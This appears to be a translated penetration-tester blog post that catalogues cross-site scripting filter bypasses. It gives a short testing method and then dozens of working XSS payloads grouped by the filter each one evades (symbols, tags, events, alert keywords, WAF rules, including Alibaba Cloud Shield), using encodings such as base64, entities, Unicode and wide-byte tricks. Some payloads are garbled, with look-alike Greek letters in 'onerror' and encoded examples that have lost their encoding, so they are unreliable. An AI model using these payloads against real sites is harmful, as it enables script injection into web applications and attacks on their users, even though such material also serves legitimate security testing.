1 Overview
I have done a lot of penetration tests and found that there are various mechanisms to intercept XSS in the system. Here I would like to share my experience of bypassing XSS.
When you first started learning XSS, the initial attack method might be to organize the payloads into a dictionary, and then try them one by one, or put them into burpsuite for blasting. This is a very direct and effective way, but if the defense mechanism is to directly escape special characters, the effect may be relatively poor, so the experience I share here is a step-by-step analysis process.
The process of XSS attack:
1. Observe whether the input data is echoed on the page
2. Determine the XSS defense mechanism
3. Construct XSS Payload
4. Trigger XSS statement
2. Observe whether the input data is echoed on the page
My experience is to use burpsuite directly, intercept the sent data packets, and then add tags to the parameters, such as abcddcba, a value that does not exist in normal pages, and then query the tags in the return packet, but if it is stored XSS, it may not be found in the current return packet. In this case, you can directly query the tags in the page with F12.
According to the echo, I have encountered three situations at present:
1. Outside the label
2. In the event
3. Inside the js code
Special case: If there is a log statistics function in the system, if this function will save information such as access IP, user input account or password, etc., this function can also be used to carry out XSS attacks. (Access IP can be modified into XSS statement by using X-Forwarded For)
3. Judging the XSS defense mechanism
There are many ways to judge the XSS defense mechanism. I may like to proceed step by step, so my order is:
1. Observe whether it is front-end filtering ; 2. Whether
it is blacklist filtering ;
4. Construct XSS Payload
When encountering the use of blacklist for filtering, you can analyze its filtering rules step by step.
1. Special symbols <>”()`’, etc.
2. Labels
3. Events
4. Behavior
①Special symbols:
1. Filter parentheses ()
can be replaced by ``
<script>alert`1`</script>You can use the materialized %26lpar;%26rpar; instead
"/><math/href=javascript%26colon;alert%26lpar;1%26rpar;>1</math>
Can be replaced using hexadecimal (1)
<img src=111 onerror=javascript:alert(1)>
Can be replaced with decimal
<a href="javascript:alert(/1/)">a</a>
2. Filtering parentheses () and backticks ``
can be base64 encoded
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object>
You can use the pound sign # (but this payload can only be triggered under IE10, and there will be a pop-up window similar to the date)
<img language=vbs src=<b onerror=alert#1/1#>
You can use single quotes 'colon: (but this payload can only be triggered below IE8)
<script language=vbs></script><img src=xx:x onerror="::alert+'1'::">
Square brackets [] can be used
<![if<iframe/οnlοad=vbs::alert[:]>
3. Filter the colon:
Use: Entity: to replace
<a href=javascript:alert(2)>1</a>
4. Filter angle brackets <>
can try URLencode, or secondary URLencode
%3cscript%3ealert(1)%3c%2Fscript%3e
%253cscript%253ealert(1)%253c%252Fscript%253e
Uppercase and lowercase %3c and %3e may also have miraculous effects
%3Cscript%3Ealert(1)%3C%2Fscript%3E
5. Filter spaces
can be slash/
<img/src=1/οnerrοr=alert(1)>
6. Filter equal sign =
<script>alert(1)</script>
② label
There are quite a lot of tags that can trigger XSS, some examples
1.a tag (recommended when the number of characters is limited)
<a href=”javascript:alert(1)">1</a>
2. script tag
<script>alert(1)</script>
3. button label
<button onfocus=alert(1)>
4. iframe tag
<iframe onload=alert(1)>
5. img tag
<img src=1 onerror=alert(1)>
6. math label
<math href="javascript:alert(1)">1</math>
7.command label
<command oncut=alert(1)>1</command>
8. object tag
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object>
9. svg tag
<svg onload=alert(1)>
Of course, there are many tags that can be triggered, such as div, p, textarea, audio, var, video, etc.
10. The way to bypass tags is of course capitalization
<ScRipt>alert(1)</ScRipt>
③Event
1. Filter on events
and formaction events
<form><button formaction=javascript:alert(1)>1
Use the href event
<a href=javascript:alert(1)>
use data event
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object>
2. Limit the length.
It is recommended to use oncut and cut trigger
<a/oncut=alert(1)>1
3. This can also be bypassed using capitalization
④ Behavior
1.
You can use prompt to filter alert
<script>prompt(1)</script>
can use confirm
<script>confirm(1)</script>
You can use document.write
<script>document.write(1)</script>
You can use window.open
<script>window.open(1)</script>
2. Filter alert, prompt, confirm, document.write, window.open, etc.
Use decimal to replace
<img src=1 onerror=javascript:alert('XSS')>
Similarly, hexadecimal can also
use base64 encoding
<a href="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">test</a>
Use JSencode
<script>\u{61}l\u{65}rt`1`</script>
But using patchwork
<script>this["ale"+"rt"]`666`</script>
or
<img src=0 onerror="var a='al';var b='ert';a+=b;top[a](1)">
Use Unicode encoding
<img src=0 onerror=%5Cu0061%5Cu006c%5Cu0065%5Cu0072%5Cu0074(22)>
materialize using html
<a href="javascript:alert(1)">Hello</a>
3. Filter javascript
to use decimal to replace
<a href=javascript:alert(2)>1</a>
Similarly hexadecimal can also be
<a href=javascript:alert(2)>1</a>
This use of capitalization can also be bypassed
4. The use of capitalization can also be bypassed
<script>ALerT(1)</script>
Replacement processing is performed when it is echoed.
1. Replace it with empty.
At this time, it can be reused to bypass
<scrscriptipt>alert(1)</scrscriptipt>
When the script is replaced with empty, the scr and ipt before and after can be merged
2. Use backslash \ to escape,
you can use wide byte merge\
%df“ οnerrοr=alert(1) a=%df”1
Will add \ in double quotes, which is combined with %df into one character
Some actual situations encountered:
1. The system filters incidental events such as onclick, adding an underscore after on to become on_click, data, expression, javascript, vbscript, etc. are all filtered,
<img src=1 on/οnerrοr=alert(1)>
2. Filter method javascript:|alert|confirm|window|document||prompt|1 (encoding)|(1) (encoding)
<math/href=javascripT%26NewLine;:/1/[Symbol.replace]('1',alert)>1</math>
3. The echo field is inside the label, the angle brackets <> and brackets () are filtered, and the label is in the type attribute as hidden:
accesskey can be used
%22%20accesskey=%22x%22%20οnclick=alert%601%60%20a=%221
firefox browser trigger method Shift+Alt+x
Other browsers have not been successful yet
4. Bypass Alibaba Cloud Shield (storage XSS vulnerability)
\"><object data=data:text/html;base64,PG9iamVjdCBkYXRhPWRhdGE6dGV4dC9odG1sO2Jhc2U2NCxQSE5qY21sd2RENWhiR1Z5ZENnaWFHRmphMlZ5SWlrOEwzTmpjbWx3ZEQ0PT4=>
5. Bypass the on event behavior and restrict base64 encryption
<object data=data:text/html;charset=utf-8,<script>alert(1)<%2fscript>></object>
5. Finally
Bypass can be used together, this is the most interesting point, this article may not be very complete, if there are new interesting bypass methods, I will continue to update, thank you!